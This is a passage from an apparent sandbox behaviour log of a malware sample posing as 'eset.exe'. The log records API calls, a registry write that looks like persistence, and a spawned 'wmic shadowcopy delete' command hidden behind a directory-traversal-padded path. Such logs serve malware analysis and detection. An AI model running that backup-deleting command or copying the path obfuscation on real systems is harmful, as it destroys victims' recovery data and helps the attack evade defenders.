lpString2="EnumWindowStationsA" | out: lpString1="EnumWindowStationsA") returned="EnumWindowStationsA" [0092.994] lstrlenA (lpString="ENUMWINDOWSTATIONSA") returned 19 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumWindowStationsW" | out: lpString1="EnumWindowStationsW") returned="EnumWindowStationsW" [0092.994] lstrlenA (lpString="ENUMWINDOWSTATIONSW") returned 19 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EnumWindows" | out: lpString1="EnumWindows") returned="EnumWindows" [0092.994] lstrlenA (lpString="ENUMWINDOWS") returned 11 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="EqualRect" | out: lpString1="EqualRect") returned="EqualRect" [0092.994] lstrlenA (lpString="EQUALRECT") returned 9 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="ExcludeUpdateRgn" | out: lpString1="ExcludeUpdateRgn") returned="ExcludeUpdateRgn" [0092.994] lstrlenA (lpString="EXCLUDEUPDATERGN") returned 16 [0092.994] lstrcpyA (in: lpString1=0x49af288, lpString2="ExitWindowsEx" | out: lpString1="ExitWindowsEx") returned="ExitWindowsEx" [0092.994] lstrlenA (lpString="EXITWINDOWSEX") returned 13 [0092.995] lstrcpyA (in: lpString1=0x49af288, lpString2="FillRect" | out: lpString1="FillRect") returned="FillRect" [0092.995] lstrlenA (lpString="FILLRECT") returned 8 [0092.995] lstrcpyA (in: lpString1=0x49af288, lpString2="FindWindowA" | out: lpString1="FindWindowA") returned="FindWindowA" [0092.995] lstrlenA (lpString="FINDWINDOWA") returned 11 [0092.995] lstrcpyA (in: lpString1=0x49af288, lpString2="FindWindowExA" | out: lpString1="FindWindowExA") returned="FindWindowExA" [0092.995] wsprintfW (in: param_1=0x360000, param_2="\"%s\"" | out: param_1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe\"") returned 48 [0092.995] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe\"") returned 48 [0092.995] RegSetValueExW (in: hKey=0x42c, lpValueName="54259", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe\"", cbData=0x60 | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\eset.exe\"") returned 0x0 [0092.996] VirtualFree (lpAddress=0x360000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.996] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.996] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.996] VirtualFree (lpAddress=0x190000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.997] RegCloseKey (hKey=0x42c) returned 0x0 [0092.997] VirtualFree (lpAddress=0x180000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.997] VirtualFree (lpAddress=0x170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.997] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.998] VirtualFree (lpAddress=0x150000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.998] RtlExitUserThread (Status=0x0) Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x998" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 8 os_tid = 0x7d0 Thread: id = 9 os_tid = 0x5b4 Thread: id = 10 os_tid = 0x790 Thread: id = 11 os_tid = 0x330 Thread: id = 12 os_tid = 0x7f8 Thread: id = 13 os_tid = 0x430 Thread: id = 14 os_tid = 0x268 Thread: id = 15 os_tid = 0x768 Thread: id = 16 os_tid = 0x764 Thread: id = 17 os_tid = 0x760 Thread: id = 18 os_tid = 0x75c Thread: id = 19 os_tid = 0x70c Thread: id = 20 os_tid = 0x6e8 Thread: id = 21 os_tid = 0x6d8 Thread: id = 22 os_tid = 0x6d4 Thread: id = 23 os_tid = 0x6c8 Thread: id = 24 os_tid = 0x6c0 Thread: id = 25 os_tid = 0x6b8 Thread: id = 26 os_tid = 0x6a4 Thread: id = 27 os_tid = 0x6a0 Thread: id = 28 os_tid = 0x690 Thread: id = 29 os_tid = 0x67c Thread: id = 30 os_tid = 0x490 Thread: id = 31 os_tid = 0x454 Thread: id = 32 os_tid = 0x450 Thread: id = 33 os_tid = 0x428 Thread: id = 34 os_tid = 0x424 Thread: id = 35 os_tid = 0x420 Thread: id = 36 os_tid = 0x404 Thread: id = 37 os_tid = 0x18c Thread: id = 38 os_tid = 0xf0 Thread: id = 39 os_tid = 0xc8 Thread: id = 40 os_tid = 0x3f0 Thread: id = 41 os_tid = 0x3e4 Thread: id = 42 os_tid = 0x398 Thread: id = 43 os_tid = 0x394 Thread: id = 44 os_tid = 0x390 Thread: id = 45 os_tid = 0x38c Thread: id = 46 os_tid = 0x378 Thread: id = 47 os_tid = 0x370 Thread: id = 56 os_tid = 0x9f4 Thread: id = 61 os_tid = 0xaa0 Thread: id = 62 os_tid = 0xaa4 Thread: id = 102 os_tid = 0xb40 Thread: id = 103 os_tid = 0xb44 Thread: id = 104 os_tid = 0xb48 Thread: id = 105 os_tid = 0xb4c Thread: id = 106 os_tid = 0xb50 Thread: id = 107 os_tid = 0xb54 Thread: id = 108 os_tid = 0xb58 Thread: id = 111 os_tid = 0xb64 Thread: id = 112 os_tid = 0xb68 Thread: id = 116 os_tid = 0xbfc Thread: id = 117 os_tid = 0x804 Thread: id = 118 os_tid = 0x810 Thread: id = 126 os_tid = 0x110 Thread: id = 127 os_tid = 0x8c8 Thread: id = 128 os_tid = 0x7cc Thread: id = 129 os_tid = 0x798 Thread: id = 130 os_tid = 0x7a4 Thread: id = 132 os_tid = 0x590 Thread: id = 133 os_tid = 0x7e0 Thread: id = 178 os_tid = 0x288 Thread: id = 179 os_tid = 0x854 Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x65907000" os_pid = "0x81c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 48 os_tid = 0x83c Thread: id = 49 os_tid = 0x838 Thread: id = 50 os_tid = 0x834 Thread: id = 51 os_tid = 0x830 Thread: id = 52 os_tid = 0x82c Thread: id = 53 os_tid = 0x828 Thread: id = 54 os_tid = 0x824 Thread: id = 55 os_tid = 0x820 Thread: id = 110 os_tid = 0xb60 Thread: id = 183 os_tid = 0x974 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x2ab18000" os_pid = "0xaa8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x36c" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0005296d" [0xc000000f] Thread: id = 63 os_tid = 0xaac Thread: id = 64 os_tid = 0xab0 Thread: id = 65 os_tid = 0xab4 Thread: id = 66 os_tid = 0xab8 Thread: id = 67 os_tid = 0xabc Thread: id = 68 os_tid = 0xac0 Thread: id = 69 os_tid = 0xac4 Thread: id = 101 os_tid = 0xb18 Thread: id = 109 os_tid = 0xb5c Thread: id = 177 os_tid = 0x2b4 Thread: id = 184 os_tid = 0x91c Process: id = "5" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x29b60000" os_pid = "0xacc" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0xaa8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00052e1e" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 72 os_tid = 0xae4 Thread: id = 73 os_tid = 0xae0 [0052.868] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xe0dc20 | out: lpSystemTimeAsFileTime=0xe0dc20*(dwLowDateTime=0x9bbd0260, dwHighDateTime=0x1d5981b)) [0052.868] GetCurrentProcessId () returned 0xacc [0052.868] GetCurrentThreadId () returned 0xae0 [0052.868] GetTickCount () returned 0x1145e08 [0052.868] QueryPerformanceCounter (in: lpPerformanceCount=0xe0dc28 | out: lpPerformanceCount=0xe0dc28*=17310998241) returned 1 [0052.868] malloc (_Size=0x100) returned 0xd8e80 Thread: id = 74 os_tid = 0xadc Thread: id = 75 os_tid = 0xad8 Thread: id = 76 os_tid = 0xad0 Thread: id = 77 os_tid = 0xae8 Thread: id = 78 os_tid = 0xaec Thread: id = 94 os_tid = 0xb08 Thread: id = 185 os_tid = 0x908 Process: id = "6" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0xacc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 79 os_tid = 0xa74 Thread: id = 80 os_tid = 0x9a0 Thread: id = 81 os_tid = 0x858 Thread: id = 82 os_tid = 0x76c Thread: id = 83 os_tid = 0x758 Thread: id = 84 os_tid = 0x74c Thread: id = 85 os_tid = 0x72c Thread: id = 86 os_tid = 0x71c Thread: id = 87 os_tid = 0x718 Thread: id = 88 os_tid = 0x638 Thread: id = 89 os_tid = 0x154 Thread: id = 90 os_tid = 0x150 Thread: id = 91 os_tid = 0x12c Thread: id = 92 os_tid = 0x120 Thread: id = 93 os_tid = 0x3fc Thread: id = 131 os_tid = 0x7a0 Thread: id = 181 os_tid = 0x930 Process: id = "7" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x29c66000" os_pid = "0xaf0" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0xacc" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:000532f4" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 95 os_tid = 0xb10 Thread: id = 96 os_tid = 0xb0c Thread: id = 97 os_tid = 0xb04 Thread: id = 98 os_tid = 0xb00 Thread: id = 99 os_tid = 0xafc Thread: id = 100 os_tid = 0xaf4 Thread: id = 186 os_tid = 0x970 Process: id = "8" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x213c6000" os_pid = "0x6a8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x998" cmd_line = "\"C:\\bkbe\\yq\\gay\\..\\..\\..\\Windows\\cyh\\huxn\\t\\..\\..\\..\\system32\\a\\e\\b\\..\\..\\..\\wbem\\rop\\mxutf\\..\\..\\wmic.exe\" shadowcopy delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 119 os_tid = 0x4fc [0090.703] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efa90 | out: lpSystemTimeAsFileTime=0x1efa90*(dwLowDateTime=0xb22a76e0, dwHighDateTime=0x1d5981b)) [0090.703] GetCurrentProcessId () returned 0x6a8 [0090.703] GetCurrentThreadId () returned 0x4fc [0090.703] GetTickCount () returned 0x114f104 [0090.703] QueryPerformanceCounter (in: lpPerformanceCount=0x1efa98 | out: lpPerformanceCount=0x1efa98*=21094527838) returned 1 [0090.704] GetModuleHandleW (lpModuleName=0x0) returned 0xffff0000 [0090.705] __set_app_type (_Type=0x1) [0090.705] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x10003ced0) returned 0x0 [0090.705] __wgetmainargs (in: _Argc=0x100062380, _Argv=0x100062390, _Env=0x100062388, _DoWildCard=0, _StartInfo=0x10006239c | out: _Argc=0x100062380, _Argv=0x100062390, _Env=0x100062388) returned 0 [0090.707] ??0CHString@@QEAA@XZ () returned 0x100062ab0 [0090.708] malloc (_Size=0x30) returned 0x165a10 [0090.709] malloc (_Size=0x70) returned 0x165a50 [0090.709] malloc (_Size=0x50) returned 0x167d20 [0090.709] malloc (_Size=0x30) returned 0x167d80 [0090.709] malloc (_Size=0x48) returned 0x167dc0 [0090.709] malloc (_Size=0x30) returned 0x167e10 [0090.709] malloc (_Size=0x30) returned 0x167e50 [0090.709] ??0CHString@@QEAA@XZ () returned 0x100062f58 [0090.709] malloc (_Size=0x30) returned 0x167e90 [0090.709] ?Empty@CHString@@QEAAXXZ () returned 0x7fef877482c [0090.709] SetConsoleCtrlHandler (HandlerRoutine=0x100035724, Add=1) returned 1 [0090.709] _onexit (_Func=0x10004f378) returned 0x10004f378 [0090.710] _onexit (_Func=0x10004f490) returned 0x10004f490 [0090.710] _onexit (_Func=0x10004f4d0) returned 0x10004f4d0 [0090.710] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.710] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0090.713] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0090.722] CoCreateInstance (in: rclsid=0xffff73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffff7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x100062940 | out: ppv=0x100062940*=0x1f21390) returned 0x0 [0090.733] GetCurrentProcess () returned 0xffffffffffffffff [0090.733] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x1ef860 | out: TokenHandle=0x1ef860*=0xf4) returned 1 [0090.733] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ef858 | out: TokenInformation=0x0, ReturnLength=0x1ef858) returned 0 [0090.733] malloc (_Size=0x118) returned 0x166a10 [0090.733] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x166a10, TokenInformationLength=0x118, ReturnLength=0x1ef858 | out: TokenInformation=0x166a10, ReturnLength=0x1ef858) returned 1 [0090.733] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x166a10*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=379257964, Attributes=0xe9cb), (Luid.LowPart=0x0, Luid.HighPart=1474256, Attributes=0x0), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072), (Luid.LowPart=0x6c006c, Luid.HighPart=7733340, Attributes=0x2e0031))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0090.733] free (_Block=0x166a10) [0090.733] CloseHandle (hObject=0xf4) returned 1 [0090.734] malloc (_Size=0x40) returned 0x167ed0 [0090.734] malloc (_Size=0x40) returned 0x167f20 [0090.734] malloc (_Size=0x40) returned 0x167f70 [0090.734] malloc (_Size=0x20a) returned 0x166a10 [0090.734] GetSystemDirectoryW (in: lpBuffer=0x166a10, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0090.735] free (_Block=0x166a10) [0090.735] malloc (_Size=0x18) returned 0x166a10 [0090.735] malloc (_Size=0x18) returned 0x166a30 [0090.735] malloc (_Size=0x18) returned 0x166a50 [0090.735] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0090.735] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0090.735] free (_Block=0x166a10) [0090.735] free (_Block=0x166a30) [0090.735] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x76e30000 [0090.735] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0090.735] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0090.735] FreeLibrary (hLibModule=0x76e30000) returned 1 [0090.735] free (_Block=0x166a50) [0090.735] _vsnwprintf (in: _Buffer=0x167f70, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x1ef488 | out: _Buffer="ms_409") returned 6 [0090.736] malloc (_Size=0x20) returned 0x166a10 [0090.736] GetComputerNameW (in: lpBuffer=0x166a10, nSize=0x1ef860 | out: lpBuffer="XDUWTFONO", nSize=0x1ef860) returned 1 [0090.736] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.736] malloc (_Size=0x14) returned 0x166a40 [0090.736] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.736] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x1ef858 | out: lpNameBuffer=0x0, nSize=0x1ef858) returned 0x7fffffde000 [0090.737] GetLastError () returned 0xea [0090.737] malloc (_Size=0x40) returned 0x166a60 [0090.737] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x166a60, nSize=0x1ef858 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ef858) returned 0x1 [0090.738] lstrlenW (lpString="") returned 0 [0090.738] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.738] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0090.740] lstrlenW (lpString=".") returned 1 [0090.740] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0090.740] lstrlenW (lpString="LOCALHOST") returned 9 [0090.740] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0090.740] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.740] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.740] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0090.740] free (_Block=0x166a40) [0090.740] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.740] malloc (_Size=0x14) returned 0x166a40 [0090.740] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.740] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.740] malloc (_Size=0x14) returned 0x166ab0 [0090.740] lstrlenW (lpString="XDUWTFONO") returned 9 [0090.740] malloc (_Size=0x8) returned 0x166ad0 [0090.740] malloc (_Size=0x18) returned 0x166af0 [0090.740] malloc (_Size=0x30) returned 0x166b10 [0090.740] malloc (_Size=0x18) returned 0x166b50 [0090.740] SysStringLen (param_1="IDENTIFY") returned 0x8 [0090.740] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0090.741] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0090.741] SysStringLen (param_1="IDENTIFY") returned 0x8 [0090.741] malloc (_Size=0x30) returned 0x166b70 [0090.741] malloc (_Size=0x18) returned 0x166bb0 [0090.741] SysStringLen (param_1="IMPERSONATE") returned 0xb [0090.741] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0090.741] SysStringLen (param_1="IMPERSONATE") returned 0xb [0090.741] SysStringLen (param_1="IDENTIFY") returned 0x8 [0090.741] SysStringLen (param_1="IDENTIFY") returned 0x8 [0090.741] SysStringLen (param_1="IMPERSONATE") returned 0xb [0090.741] malloc (_Size=0x30) returned 0x166bd0 [0090.741] malloc (_Size=0x18) returned 0x166c10 [0090.741] SysStringLen (param_1="DELEGATE") returned 0x8 [0090.741] SysStringLen (param_1="IDENTIFY") returned 0x8 [0090.741] SysStringLen (param_1="DELEGATE") returned 0x8 [0090.741] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0090.741] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0090.741] SysStringLen (param_1="DELEGATE") returned 0x8 [0090.741] malloc (_Size=0x30) returned 0x166c30 [0090.741] malloc (_Size=0x18) returned 0x166c70 [0090.741] malloc (_Size=0x30) returned 0x166c90 [0090.741] malloc (_Size=0x18) returned 0x166cd0 [0090.741] SysStringLen (param_1="NONE") returned 0x4 [0090.741] SysStringLen (param_1="DEFAULT") returned 0x7 [0090.741] SysStringLen (param_1="DEFAULT") returned 0x7 [0090.741] SysStringLen (param_1="NONE") returned 0x4 [0090.741] malloc (_Size=0x30) returned 0x166cf0 [0090.741] malloc (_Size=0x18) returned 0x166d30 [0090.741] SysStringLen (param_1="CONNECT") returned 0x7 [0090.741] SysStringLen (param_1="DEFAULT") returned 0x7 [0090.741] malloc (_Size=0x30) returned 0x166d50 [0090.741] malloc (_Size=0x18) returned 0x166d90 [0090.742] SysStringLen (param_1="CALL") returned 0x4 [0090.742] SysStringLen (param_1="DEFAULT") returned 0x7 [0090.742] SysStringLen (param_1="CALL") returned 0x4 [0090.742] SysStringLen (param_1="CONNECT") returned 0x7 [0090.742] malloc (_Size=0x30) returned 0x166db0 [0090.742] malloc (_Size=0x18) returned 0x166df0 [0090.742] SysStringLen (param_1="PKT") returned 0x3 [0090.742] SysStringLen (param_1="DEFAULT") returned 0x7 [0090.742] SysStringLen (param_1="PKT") returned 0x3 [0090.742] SysStringLen (param_1="NONE") returned 0x4 [0090.742] SysStringLen (param_1="NONE") returned 0x4 [0090.742] SysStringLen (param_1="PKT") returned 0x3 [0090.742] malloc (_Size=0x30) returned 0x166e10 [0090.742] malloc (_Size=0x18) returned 0x166e50 [0090.742] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0090.742] SysStringLen (param_1="DEFAULT") returned 0x7 [0090.742] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0090.742] SysStringLen (param_1="NONE") returned 0x4 [0090.742] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0090.742] SysStringLen (param_1="PKT") returned 0x3 [0090.742] SysStringLen (param_1="PKT") returned 0x3 [0090.742] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0090.742] malloc 